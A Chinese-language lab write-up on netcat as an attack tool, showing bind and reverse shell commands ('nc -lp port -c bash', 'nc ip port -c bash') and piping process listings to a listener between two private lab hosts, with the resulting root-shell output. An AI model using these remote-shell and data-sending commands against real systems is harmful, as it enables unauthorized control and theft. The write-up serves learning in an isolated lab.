攻击工具-nc linux实验I

参考:https://www.jianshu.com/p/cb26a0f6c622

I)正向连接测试

NC远程控制
这个比较有意思，我放在第一。
正向连接
A:nc -lp port -c bash
B:nc ip port
A将自己的Bash发给B
实验使用
A 192.168.100.120
B 192.168.100.121
[120 netcat]# nc -lp 12222 -c bash
bash:行3: ipconfig: 未找到命令
bash:行4: $'\r': 未找到命令
bash:行7: $'p\b': 未找到命令


[121@netcat]# ./nc 192.168.100.120 12222
ls
nc
pwd
/root/tool/netcat
ipconfig
^M
ip add
1: lo: mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens192: mtu 1500 qdisc mq state UP qlen 1000
    link/ether 00:0c:29:a4:fb:01 brd ff:ff:ff:ff:ff:ff
    inet 192.168.100.120/24 brd 192.168.100.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fea4:fb01/64 scope link
       valid_lft forever preferred_lft forever
whoami
root
p^H
who
root     pts/0        2018-09-13 09:42 (192.168.88.66)
ps -ef|grep java
root      1262  1185  0 09:46 pts/0    00:00:01 java -jar fitnesse-standalone.jar
root      1330  1318  0 09:58 pts/0    00:00:00 grep java


II)反向连接
A:nc -lp port
B:nc ip port -c bash
B将自己的Bash发给A
win下Bash换成cmd
实验使用
A 192.168.100.120
B 192.168.100.121
[120 netcat]# nc -lp 12222
ip add
1: lo: mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens192: mtu 1500 qdisc mq state UP qlen 1000
    link/ether 00:50:56:b8:77:74 brd ff:ff:ff:ff:ff:ff
    inet 192.168.100.121/24 brd 192.168.100.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:feb8:7774/64 scope link
       valid_lft forever preferred_lft forever
who
root     pts/0        2018-09-13 09:43 (192.168.88.66)
[121 netcat]# ./nc 192.168.100.120 12222 -c bash

III) 发送文本信息
简单的建立连接，就是侦听模式和传输模式
nc -l -p port监听指定端口号
nc -nv ip port连接对方tcp端口，默认情况下，双方可以发送文本信息
实验使用
A 192.168.100.120
B 192.168.100.121
[120 netcat]# nc -l -p 12222
hi
ok ^H
hi121i^H^H^H
ok120iam121
[121 netcat]# ./nc -nv 192.168.100.120 12222
192.168.100.120:12222 (192.168.100.120) open
hi
ok
hi121i
ok120iami^H121
^C

IV)一次性数据收集
收集目标机上的进程信息
nc -l -p 4444 >wing.txt将远程发送过来的内容保存在本地
Ps aux |nc -nv ip port -q 1 标准输入完成后delay一秒钟，会发送到侦听端
实验使用
A 192.168.100.120
B 192.168.100.121
[120 netcat]# nc -l -p 12222 >wing.log
[120 netcat]# cat wing.log
root      2753  0.0  0.0 112720   972 pts/0    S+   10:20   0:00 grep --color=auto java

[121 netcat]# ps aux|grep java|./nc -nv 192.168.100.120 12222
192.168.100.120:12222 (192.168.100.120) open